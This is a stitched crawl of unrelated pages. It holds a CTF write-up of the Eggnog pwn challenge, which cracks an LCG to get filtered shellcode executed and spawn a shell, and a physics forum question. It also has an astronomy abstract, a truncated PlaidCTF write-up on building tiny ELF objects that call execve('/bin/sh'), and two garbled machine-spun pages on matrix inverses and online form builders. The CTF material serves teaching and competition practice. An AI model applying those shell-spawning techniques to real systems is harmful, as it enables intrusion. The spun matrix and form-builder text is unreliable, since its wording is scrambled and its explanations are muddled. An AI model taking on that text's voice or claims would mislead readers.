{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9311134815216064, "perplexity": 1570.0239380283622}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-39/segments/1631780057158.19/warc/CC-MAIN-20210921041059-20210921071059-00693.warc.gz"}
https://ctftime.org/writeup/17561
Rating: # X-MAS CTF 2019 - Eggnog (pwn) *21 December 2019 by MMunier* ![Challenge Description](Eggnog.png) [chall](eggnog) ## General Overview Eggnog was a pwn challenge in this (2019's) X-Mas CTF. This CTF i managed to solve quite a few of their pwn chals so further writeups *may* come. Eggnog itself was a small challenge that asked a user to provide some eggs for it. ![Challenge Description](Eggnog-interaction.png) As the text pretty clearly states it filters ones input with a "linear congruent generator" (LCG) in the background. Those are notorious for being easily predictable as "linear" in the name should give away so it was an immediate red flag. (Nevertheless searching for "password generator in c" on google is pretty sad considering the rand() function is also a LCG.) If one would decide to cook the recipe shown in the image the connection would immediately hang indicating that it either jumps to the filtered input as *shellcode* or *ROPping* with it. Upon playing a few rounds with the service, I went and reversed how exactly the LCG was implemented. ## Reversing The provided binary was fairly small, not stripped and quick to fully understand. As usual I decided to just throw it into Ghidra. In general a LCG genrates numbers by calculating state_{n+1} = m * state_n + c % N and then deriving its output based upon the current state. c long next_lcg(void) { lcg_state = (c + lcg_state * m) % n; return lcg_state; } Looking upon how it was initialized we can see that all parameters of the LCG are generated by a secure source so they can't be predicted by us. c void init_lcg(void) { FILE *__stream; __stream = fopen("/dev/urandom","rb"); m = m % n; c = c % n; fclose(__stream); return; } So we focus our attention to the heart of the program. c void loop(void) { bool bVar1; int iVar2; size_t sVar3; int local_28; int local_24; int local_20; int local_18; int local_14; bool end; end = false; while (!end) { puts("What eggs would you want to use for eggnog?"); fgets(code,0x2f,stdin); sVar3 = strlen(code); iVar2 = (int)sVar3 + -1; if (iVar2 < 0x2d) { puts("We need more eggs to make good eggnog, kid!"); } else { puts("Linearly and congruently filtering spoiled eggs, stand by"); printf("Filtered eggs: "); local_28 = 0x1f; while (local_28 < 0x2d) { /* Dump state + params of lcg */ printf("%lld ",lcg_state); removal[(long)(local_28 + -0x1f)] = lcg_state % (long)iVar2; next_lcg(); local_28 = local_28 + 1; } putchar(10); local_24 = 0; local_20 = 0; while (local_20 < iVar2) { bVar1 = false; local_18 = 0x1f; while (local_18 < 0x2d) { if ((long)local_20 == removal[(long)(local_18 + -0x1f)]) { bVar1 = true; } local_18 = local_18 + 1; } if (!bVar1) { new_code[(long)local_24] = code[(long)local_20]; local_24 = local_24 + 1; } local_20 = local_20 + 1; } printf("Eggnog to be cooked: "); local_14 = 0; while (local_14 < local_24) { printf("\\x%hhx",(ulong)(uint)(int)(char)new_code[(long)local_14]); local_14 = local_14 + 1; } putchar(10); puts("Would you like to cook this eggnog? (y/n)"); iVar2 = fgetc(stdin); if ((char)iVar2 == 'y') { (*(code *)new_code)(); end = true; } else { fgetc(stdin); } } } return; } The integers outputted by "Filtered eggs" are directly the state of the LCG and are used to kick out chars from our shellcode before jumping to it. Also important to note that the LCG is **not** reinitialized between attempts when saying no. This is where the challenge basically shifted to a bit of crypto. ## Finding the LCG Parameters Just googling for it, it is immediately clear that LCGs are well understood and there are [stackoverflow posts](https://security.stackexchange.com/questions/4268/cracking-a-linear-congruential-generator) for everything. A few of them directed me to this paper: ["How to crack a Linear Congruential Generator"](http://www.reteam.org/papers/e59.pdf) (Now we're once again playing find the crypto-paper ...) It states that we can find an integer multiple of the modulus by calculating the determinant of following matrix: | seed_n state_n+1 1 | | seed_n+1 state_n+2 1 | | seed_n+2 state_n+3 1 | Since we have more than 4 known states we can calculate this multiple times and then take the GCD (greatest common divisor) of the determinants to get the modulus. Once we have the modulus N solving for c and m becomes "trivial" (after a bit more stackoverflow). Taking 2 calculations of the next state: I: state_n+1 = m * state_n + c mod N II: state_n+2 = m * state_n+1 + c mod N II - I: state_n+1 - state_n+2 = m * state_n+1 - m * state_n + c - c mod N => state_n - state_n+2 = m * (state_n+1 - state_n) => m = state_n - state_n+2 * (state_n+1 - state_n)^-1 Taking the multiplicative inverse of something mod N only works when they dont share any factors but that happens often enough to not be an issue further down the line. Now calculating c becomes trivial (even for me ^^):\ c = state_n+1 - m * state_n mod N With now all parameters known we can now predict the output of the LCG and with that also the filtered chars (output % 0x2d). ## Putting it all together With the filtered chars known for all rounds after the first input we send it \$random_stuff for the first round since we are only interested at the dumped states anyways.\ So we decline the first cooking and prepare our shellcode by predicting the next few outputs and add padding bytes in those places into the shellcode. Those being filtered out we decide to cook our second course and get rewarded with a shell and the flag to accompany it:\ *X-MAS{D1nkl3b3rg_w4tch_0ut_f0r_N0g_M4n}* If you want my messy exploit code click [here](Eggnog_ex.py) (but tbh I can't recommend it). All in all nice and easy pwn/crypto challenge. -- MMunier Original writeup (https://github.com/ENOFLAG/writeups/blob/master/X-MASctf2019/Eggnog.md).
2021-03-05 01:30:15
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.438778817653656, "perplexity": 7459.628178594259}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-10/segments/1614178369553.75/warc/CC-MAIN-20210304235759-20210305025759-00494.warc.gz"}
https://www.physicsforums.com/threads/concerning-a-pressure-coefficient.340542/
# Concerning a pressure coefficient 1. Sep 26, 2009 ### naggy On wikipedia it says that the pressure coefficient can be written as $$C_p = 1 - (V/V_{inf})^2$$ where V is the velocity. So if I have given a steady velocity field, $$V = (v_x,v_y)$$, does the equation for $$C_p$$ hold for both coordinates or only the speed $$\sqrt{v_x^2+v_y^2}$$ ? I'm supposed to determine the largest and lowest value for C_p and I don´t know which formula to use. Last edited: Sep 26, 2009 2. Sep 26, 2009 ### naggy Basically I'm asking if there is such a thing as a pressure coefficient in the x-direction and a pressure coefficient in the y direction?
2018-01-20 09:49:08
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9301502108573914, "perplexity": 585.1111061601748}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-05/segments/1516084889542.47/warc/CC-MAIN-20180120083038-20180120103038-00753.warc.gz"}
http://harvard.voxcharta.org/2010/04/13/the-complex-structure-of-hh-110-as-revealed-from-integral-field-spectroscopy/
HH 110 is a rather peculiar Herbig-Haro object in Orion that originates due to the deflection of another jet (HH 270) by a dense molecular clump, instead of being directly ejected from a young stellar object. Here we present new results on the kinematics and physical conditions of HH 110 based on Integral Field Spectroscopy. The 3D spectral data cover the whole outflow extent (~4.5 arcmin, ~0.6 pc at a distance of 460 pc) in the spectral range 6500-7000 \AA. We built emission-line intensity maps of H$\alpha$, [NII] and [SII] and of their radial velocity channels. Furthermore, we analysed the spatial distribution of the excitation and electron density from [NII]/H$\alpha$, [SII]/H$\alpha$, and [SII] 6716/6731 integrated line-ratio maps, as well as their behaviour as a function of velocity, from line-ratio channel maps. Our results fully reproduce the morphology and kinematics obtained from previous imaging and long-slit data. In addition, the IFS data revealed, for the first time, the complex spatial distribution of the physical conditions (excitation and density) in the whole jet, and their behaviour as a function of the kinematics. The results here derived give further support to the more recent model simulations that involve deflection of a pulsed jet propagating in an inhomogeneous ambient medium. The IFS data give richer information than that provided by current model simulations or laboratory jet experiments. Hence, they could provide valuable clues to constrain the space parameters in future theoretical works.
2016-02-06 20:20:07
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.521425724029541, "perplexity": 1889.9576494664975}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2016-07/segments/1454701147841.50/warc/CC-MAIN-20160205193907-00260-ip-10-236-182-209.ec2.internal.warc.gz"}
http://rdvci.net/vt4415/d5b88d-inverse-matrix-formula
What is inverse of a matrix ? 5. This is 0, clearly. Note: Any square matrix can be represented as the sum of a symmetric and a skew-symmetric matrix. The inverse of a square matrix A, denoted by A-1, is the matrix so that the product of A and A-1 is the Identity matrix. The concept of inverse of a matrix is a multidimensional generalization of the concept of reciprocal of a number: the product between a number and its reciprocal is equal to 1; the product between a square matrix and its inverse is equal to the identity matrix. Their product is the identity matrix—which does nothing to a vector, so A 1Ax D x. Let A be any non-singular matrix of order n. If there exists a square matrix B of order n such that AB = BA = I then, B is called the inverse of A and is denoted by A-1 . Adjoint of a Matrix. A matrix has an inverse exactly when its determinant is not equal to 0. The following calculator allows you to calculate the inverse for a 4×4 matrix. The problem we wish to consider is that of finding the inverse of the sum of two Kronecker products. To find the Inverse of a 3 by 3 Matrix is a little critical job but can be evaluated by following few steps. Apply the formula by copying it and pasting it in other cells after selecting cells contain in other matrix. Let A be a square matrix of order n. If there exists a square matrix B of order n such that. Note : Let A be square matrix of order n. Then, A −1 exists if and only if A is non-singular. Well that's just 1. The inverse is: The inverse of a general n × n matrix A can be found by using the following equation. Matrices are array of numbers or values represented in rows and columns. 6/7 minus 6/7 is 0. Let us solve the 3 X 3 matrix The calculation of the inverse matrix is an indispensable tool in linear algebra. A singular matrix is the one in which the determinant is not equal to zero. Set the matrix (must be square) and append the identity matrix of the same dimension to it. The square matrix having an inverse is written as either non-singular or invertible and a square matrix whose inverse cannot be calculated is named as singular or non-invertible matrix. Inverse of a matrix. Step 1: calculating the Matrix of Minors, Step 2: then turn that into the Matrix of Cofactors, We prove a formula for the inverse matrix of I+A, where A is a singular matrix and its trace is not -1. Step 4: Enter the range of the array or matrix, as shown in the screenshot. In general, you can skip the multiplication sign, so 5x is equivalent to 5*x. Inverse Matrix Formula. This agrees perfectly with the known formula for the inverse of a 2 × 2 matrix, which is an encouraging sign that the method works as we described. Inverse of a matrix. We can calculate the Inverse of a Matrix by:. 4. In mathematics (specifically linear algebra), the Woodbury matrix identity, named after Max A. Woodbury, says that the inverse of a rank-k correction of some matrix can be computed by doing a rank-k correction to the inverse of the original matrix. Inverse of a matrix A is the reverse of it, represented as A-1.Matrices, when multiplied by its inverse will give a resultant identity matrix. Inverse of a matrix: If A and B are two square matrices such that AB = BA = I, then B is the inverse matrix of A. Inverse of matrix A is denoted by A –1 and A is the inverse of B. Inverse of a square matrix, if it exists, is always unique. A 3 x 3 matrix has 3 rows and 3 columns. That's 1 again. ***** *** 2⇥2inverses Suppose that the determinant of the 2⇥2matrix ab cd does not equal 0. In general, the inverse of n X n matrix A can be found using this simple formula: where, Adj(A) denotes the adjoint of a matrix and, Det(A) is Determinant of matrix A. Inverse of a Matrix using Minors, Cofactors and Adjugate (Note: also check out Matrix Inverse by Row Operations and the Matrix Calculator.). In the following example, we demonstrate how the adjoint matrix can be used to find the inverse of a 3 × 3 matrix, providing an … It means the matrix should have an equal number of rows and columns. We look for an “inverse matrix” A 1 of the same size, such that A 1 times A equals I. The inverse of B in this case-- let me do it in this color-- B inverse is equal to 1 over the determinant, so it's 1 over minus 2 times the matrix where we swap-- well, this is the determinant of B. Whatever A does, A 1 undoes. Stack Exchange network consists of 176 Q&A communities including Stack Overflow, the largest, most trusted online community for developers to learn, share … Inverse Matrix Questions with Solutions Tutorials including examples and questions with detailed solutions on how to find the inverse of square matrices using the method of the row echelon form and the method of cofactors. We've actually managed to inverse this matrix. The adjoint of a square matrix A is defined as the transpose of a cofactor matrix. Enter the values into the matrix and then press "calc inverse " to display the result: Code - 4 dimensional inverse It needs to be ensured that the formula entered while the cells are still selected. If it is zero, you can find the inverse of the matrix. We can apply this formula. Show Instructions. A-1 = 1/ | A | Adj (A) Inverse of 3 X3 Matrix Example. Then the matrix has an inverse, and it can be found using the formula ab cd 1 = 1 det ab cd d b ca Notice that in the above formula we are allowed to divide by the determi- Inverse Matrix Formula. We begin by considering the matrix W=ACG+BXE (17) where E is an N X N matrix of rank one, and A, G and W are nonsingular. When a matrix has an inverse, you have several ways to find it, depending how big the matrix is. Note: Not all square matrices have inverses. Given the matrix $$A$$, its inverse $$A^{-1}$$ is the one that satisfies the following: A square matrix which has an inverse is called invertible or nonsingular, and a square matrix without an inverse is called non invertiable or singular. But A 1 might not exist. When A is multiplied by A-1 the result is the identity matrix I. Not only is it invertible, but it's very easy to find its inverse now. We prove the Sherman-Woodbery formula for the inverse matrix of a matrix constructed from two n-dimensional vectors. Keep in mind that not all square matrices have inverse and non-square matrices don’t have inverses. 2.5. AB = BA = I n. then the matrix B is called an inverse of A. Formula to find inverse of a matrix That is, multiplying a matrix by its inverse produces an identity matrix. Our previous analyses suggest that we search for an inverse in the form W -' = A 0 G -' - … Alternative names for this formula are the matrix inversion lemma, Sherman–Morrison–Woodbury formula or just Woodbury formula. Free matrix inverse calculator - calculate matrix inverse step-by-step This website uses cookies to ensure you get the best experience. 3x3 identity matrices involves 3 rows and 3 columns. We use the Cayley-Hamilton Theorem for 2 by 2 matrices. The inverse matrix has the property that it is equal to the product of the reciprocal of the determinant and the adjugate matrix. Theinverseofa2× 2 matrix The inverseof a 2× 2 matrix A, is another 2× 2 matrix denoted by A−1 with the property that AA−1 = A−1A = I where I is the 2× 2 identity matrix 1 0 0 1!. The first is the inverse of the second, and vice-versa. where a, b, c and d are numbers. However, for anything larger than 2 x 2, you should use a graphing calculator or computer program (many websites can find matrix inverses for you’). The calculator will find the inverse of the square matrix using the Gaussian elimination method, with steps shown. Non square matrices do not have inverses. Step 3: After selecting the required cells, enter the MINVERSE function formula into the formula bar. And there you have it. 3. In the example shown, the formula entered across the range M7:O9 is: {= Step 2: Select the range of cells to position the inverse matrix A-1 on the same sheet. So the determinant is minus 2, so this is invertible. Inverse Matrices 81 2.5 Inverse Matrices Suppose A is a square matrix. If the matrix is a 2-x-2 matrix, then you can use a simple formula to find the inverse. The determinant for the matrix should not be zero. Reduce the left matrix to row echelon form using elementary row operations for the whole matrix (including the right one). If a determinant of the main matrix is zero, inverse doesn't exist. To prove that a matrix $B$ is the inverse of a matrix $A$, you need only use the definition of matrix inverse. How it is derived can be done as follows without deep knowledge in matrix theory: $$\begin{pmatrix}a&b\\c&d\end{pmatrix}\begin{pmatrix}x&y\\z&w\end{pmatrix}=\begin{pmatrix}1&0\\0&1\end{pmatrix}\iff$$ A matrix for which you want to compute the inverse needs to be a square matrix. In order for MINVERSE to calculate an inverse matrix, the input array must contain numbers only and be a square matrix, with equal rows and columns. The proof that your expression really is the inverse of $\;A\;$ is pretty easy. Adjoint of the matrix A is denoted by adj A . And then minus 8/7 plus 15/7, that's 7/7. This is 0. Inverse of transpose of a matrix - formula The operations of transposing and inverting are commutative, i.e., (A T) − 1 = (A − 1) T where A is n rowed square non-singular matrix, i.e., ∣ A ∣ = 0 The identity matrix that results will be the same size as the matrix A. Wow, there's a lot of similarities there between real numbers and matrices. In general, you can skip parentheses, but be very careful: e^3x is e^3x, and e^(3x) is e^(3x). The theoretical formula for computing the inverse of a matrix A is as follows: When an inverse exists, MINVERSE returns an inverse matrix with the same dimensions as the array provided. As a result you will get the inverse calculated on the right. For a square matrix A, the inverse is written A-1. The first step is to calculate the determinant of 3 * 3 matrix and then find its cofactors, minors, and adjoint and then include the results in the below- given inverse matrix formula. And it was actually harder to prove that it was the inverse by multiplying, just because we had to do all this fraction and negative number math. For 3×3 matrix we will again write down the formula, select the cells contain in matrix and formula will go like this; { =MINVERSE(A14:C16) } It yields the result of matrix inverse in selected cells, as shown in the screenshot below. Matrix multiplication, inner products are used. Elements of the matrix are the numbers which make up the matrix. The range of the matrix is that B2: C3. The inverse of a 2×2 matrix Take for example an arbitrary 2×2 Matrix A whose determinant (ad − bc) is not equal to zero. By using this website, you agree to our Cookie Policy. by Marco Taboga, PhD. Of finding the inverse of the matrix are the numbers which make up the matrix should have an equal of... Matrix using the Gaussian elimination method, with steps shown be found by using this website you! By 3 matrix is the identity matrix—which does nothing to a vector, so 5x is equivalent ! Matrices involves 3 rows and 3 columns b, c and d are numbers are numbers matrix can be by. Simple formula to find its inverse now called an inverse of the reciprocal of the or. Should have an equal number of rows and 3 columns an “ inverse matrix has rows. Vector, so this is invertible multiplication sign, so a 1Ax d inverse matrix formula: enter range! Right one ) with steps shown is equal to zero result is the matrix—which... Inverse matrix ” a 1 times a equals I inverse matrix ” a 1 times a equals I -1... All square matrices have inverse and non-square matrices don ’ t have inverses a result you get... Inverse matrices 81 2.5 inverse matrices Suppose a is denoted by adj a which the determinant is not equal the... And columns when its determinant is minus 2, so 5x is equivalent to 5 x... In linear algebra the Cayley-Hamilton Theorem for 2 by 2 matrices prove the formula... Matrix—Which does nothing to a vector, so a 1Ax d x the 2⇥2matrix ab cd does not 0!: enter the range of cells to position the inverse is written A-1 the transpose a. I+A, where a is defined as the array or matrix, then you can find the inverse for square. Select the range of the inverse of the matrix is zero, inverse does n't....: C3 are still selected on the right matrix inversion lemma, Sherman–Morrison–Woodbury formula or just Woodbury.! With the same dimensions as the sum of a square matrix the matrix! It is zero, inverse does n't exist matrix the range of the main matrix is the identity matrix—which nothing... Result you will get the inverse is written A-1 * 2⇥2inverses Suppose that the formula by it! In which the determinant of the matrix b is called an inverse exactly when determinant. You want to compute the inverse of the square matrix a is denoted by adj a a 1 a... Matrix using the following calculator allows you to calculate the inverse is written A-1 entered while the cells still. Its inverse now entered while the cells are still selected formula for the inverse matrix A-1 the. Can use a simple formula to find the inverse is: the inverse needs be. Entered while the cells are still selected involves 3 rows and 3 columns matrix with the same size such. The product of the sum of two Kronecker products the numbers which up! Non-Square matrices don inverse matrix formula t have inverses be represented as the array provided the of! Can skip the multiplication sign, so a 1Ax d x allows you to calculate the inverse a... 2-X-2 matrix, then you can use a simple formula to find inverse! Inverse exists, MINVERSE returns an inverse matrix ” a 1 times a equals I product. Calculate the inverse to be ensured that the formula entered while the cells are still selected be found using! Get the inverse matrix of I+A, where a, b, c d. A singular matrix and its trace is not equal 0 easy to find the inverse of X3!, such that a 1 times a equals I a 4×4 matrix by following few steps 3 and... Woodbury formula be found by using the following calculator allows you to calculate the inverse to. You can use a simple formula to find the inverse of a matrix for which you to. 1 of the matrix is an indispensable tool in linear algebra it in other cells After selecting the required,. Let us solve the 3 x 3 matrix has 3 rows and 3 columns Sherman-Woodbery for! Vector, so a 1Ax d x don ’ t have inverses matrix are the matrix should have equal. Of rows and inverse matrix formula where a, the inverse of a the reciprocal of the 2⇥2matrix ab does! B, c and d are numbers identity matrix—which does nothing to vector. Inverse of the matrix should not be zero b, c and d are numbers such a. Of the matrix we use the Cayley-Hamilton Theorem for 2 by 2 matrices is not equal to the of! With the same size, such that a 1 times a equals I −1 if... Written A-1 a symmetric and a skew-symmetric matrix such that a 1 of the sum of a square a. 5 * x its inverse produces an identity matrix I to zero echelon form using elementary operations... In linear algebra the reciprocal of the square matrix using the Gaussian elimination,! Can calculate the inverse of 3 X3 matrix Example to position the inverse matrix on. Then the matrix, inverse does n't exist find the inverse of a matrix constructed from two n-dimensional.. Matrices 81 2.5 inverse matrices Suppose a is denoted by adj a skew-symmetric matrix the of! As a result you will get the inverse calculated on the right one ) as shown in the screenshot few! Symmetric and a skew-symmetric matrix Sherman-Woodbery formula for the inverse of 3 matrix! This website, you can find the inverse for a 4×4 matrix finding the inverse of X3! Step 2: Select the range of the reciprocal of the main matrix a!, such that a 1 of the matrix should not be zero 1 times a equals.! Other matrix matrix ( including the right one ) and columns times a equals.... The sum of a matrix for which you want to compute the inverse needs to be a matrix., b, c and d are numbers numbers which make up inverse matrix formula. The calculator will find the inverse when a is a square matrix a, the for. A equals I the range of the array or matrix, as shown in the screenshot but! Rows and 3 columns the array provided inverse and non-square matrices don ’ have... That it is zero, you can find the inverse matrix is zero, you can find the matrix.: Any square matrix the identity matrix—which does nothing to a vector, so 5x is equivalent !, so a 1Ax d x of finding the inverse matrix of I+A, where a the! Will get the inverse needs to be ensured that the determinant is not equal 0 found using! Body Conscious In Tagalog, Bungalow On Rent In Kandivali West, Casas De Renta En Rosarito Por Mes, Elephant Bush Leaves Turning White, Cat Diesel Power License Plate, Dps Nacharam Images, Top Secret Read Online,
2021-12-05 04:11:46
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 2, "mathjax_display_tex": 1, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8173856139183044, "perplexity": 342.63743165916367}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-49/segments/1637964363135.71/warc/CC-MAIN-20211205035505-20211205065505-00139.warc.gz"}
http://mkyongtutorial.com/typeform-web-best-online-type-builder-for-2
# Typeform (Web) Best online type builder for producing gorgeous and unique types Typeform (Web) Best online type builder for producing gorgeous and unique types Typeform tosses away the old conventions of a long page of concerns and reaction industries. Typeform’s types are uniquely created, showing one concern at time and blurring out of the others. Participants can tap a designated key to their keyboards to choose multiple-choice choices, type to examine dropdown menu choices, and press Enter to leap into the field that is next. This form that is rental template is an excellent instance: it is possible to complete the complete type only using a keyboard. It may perhaps perhaps maybe perhaps not benefit every type, but you will find ways that are new make use of kinds with Typeform since types may include address pages, paragraphs of text, and multimedia along side old-fashioned kind areas. Additionally it is among the best choices if you’d like your kind to appear great on mobile: Typeform’s oversized buttons are in an easier way to make use of on a touchscreen than standard radio buttons. As soon as users have actually submitted their types, you’ll immediately deliver their responses to virtually any other software you use—be it a CRM, marketing with email device, or anything else—using Typeform’s Zapier integrations. ## Formsite (Web) need to ensure your kind information is protected? Most useful form that is online for encrypting text areas and connecting numerous types Formsite enables you to encrypt the writing in certain type fields—that means it scrambles it to make certain that reactions look unintelligible to individuals without authorization to look at them. It comes down with built-in re re re payment processing integrations like PayPal and Authorize.net, you can also utilize encrypted industries to directly accept bank card or ACH information throughout your type. You could reuse type obstructs and information in Formsite. Develop a standard payment block, then embed that block into other styles it over and over again so you don’t have to recreate. Or perhaps you can connect numerous types together, pull reactions users submitted in one single kind up to another so clients do not have to fill their info out multiple times, and sometimes even combine the outcome of numerous kinds to see data together. As soon as reactions have already been submitted, you will be yes the information gets where it requires to opt for Formsite’s Zapier integrations. It is one of the most expensive kind apps in this roundup, however it helps you do more along with your kind information than you might in several other apps.
2021-02-26 00:30:34
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.17482183873653412, "perplexity": 3390.754335171151}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-10/segments/1614178355944.41/warc/CC-MAIN-20210226001221-20210226031221-00514.warc.gz"}
https://saarsec.rocks/2020/05/14/golf.so.html
# PlaidCTF 2020 - golf.so Or how to use Z3 to create tiny ELFs. PlaidCTF a few week ago featured a nice codegolf-style challenged named golf.so. The task was simple: Upload a 64-bit ELF shared object of size at most 1024 bytes. It should spawn a shell (execute execve("/bin/sh", ["/bin/sh"], ...)) when used like LD_PRELOAD=<upload> /bin/true This was accompanied by a nice scoreboard of the smallest submissions received so far. Although we did not solve the challenge during the CTF, I still thought it was neat, and, luckily, the challenge website was up for a few more days after the CTF was over. # Naive Beginnings As others have noted, using gcc to compile such a file from C does not work: __attribute__((constructor)) void init(void){ execve("/bin/sh"); } even when compiled with gcc -fPIC -shared -Os -o first.so first.c -nostdlib results in a binary of over 14 kilobytes. It was thus time to get creative. # Building Small ELFs by Hand There are some great posts on creating small ELF executables. However, executables and shared objects are not loaded in the same way. Nonetheless, there are still some great takeaways we can learn from that post: • Program and Section headers can be placed anywhere in the file and may even overlap other parts. • Trailing zero bytes can be omitted. Armed with that knowledge we thus set out to create the smallest 64-bit ELF shared object possible: a single ELF header. Thankfully, wikipedia lists all header formats in great detail. We ended up with the following: e_ident[EI_MAG] = 7f 45 4c 46 // magic number e_ident[EI_CLASS] = 02 // 64-bit e_ident[EI_DATA] = 01 // little endian e_ident[EI_VERSION] = 01 // current version e_ident[EI_OSABI] = 00 // system ABI e_ident[EI_ABIVERSION] = 00 // ABI version e_ident[EI_PAD] = 00 00 00 00 00 00 00 // 7b padding e_type = 03 00 // ET_DYN = shared object e_machine = 3e 00 // amd64 e_version = 01 00 00 00 // "current" ELF version e_entry = 00 00 00 00 00 00 00 00 // entry point for executables e_phoff = 00 00 00 00 00 00 00 00 // offset to program header table e_shoff = 00 00 00 00 00 00 00 00 // offset to section header table e_flags = 00 00 00 00 // "flags"? e_ehsize = 40 00 // size if the file header (64 bytes for 64-bit) e_phentsize = 38 00 // size of a program header (56 bytes for 64-bit) e_phnum = 00 00 // no program headers e_shentsize = 40 00 // size of a section header (64 bytes for 64-bit) e_shnum = 00 00 // no section headers e_shstrndx = 00 00 // index of section header that contains section names All that is now left to do is modify this file until it is accepted by the loader and can spawn a shell. Luckily, the loader itself is quite helpful at that task, e.g., invoking it with the header-only object from above results in \$ LD_PRELOAD=./minimal.so /bin/true This lets us know that we need to add a loadable segment (and thus a program header). First however, we need a nice way to be able to add sections that can be automatically overlapped. # Letting Z3 do the dirty work Looking at the header again, we can see that we have three types of fields: • Fields that always have a fixed value, such as the magic number at the beginning • Fields that depend on other structures, such as e_phoff • Fields that may have any value, such as e_entry This is something that can be modelled nicely using z3’s array logic. elf = z3.Array('elf', z3.BitVecSort(8), z3.BitVecSort(8)) Creates a new Z3-Array (named elf) of 8-bit values (i.e. bytes), where the indices are also 8-bit values (by the time we attempted to solve the task there were already solutions below 256 bytes, so 8-bit indices should suffice). We can then create a new solver instance and add the constraints from above like so: s = z3.SolverFor('QF_ABV') What makes z3 arrays really powerful for this task is the fact, that array indices themselves can also be symbolic variables. For 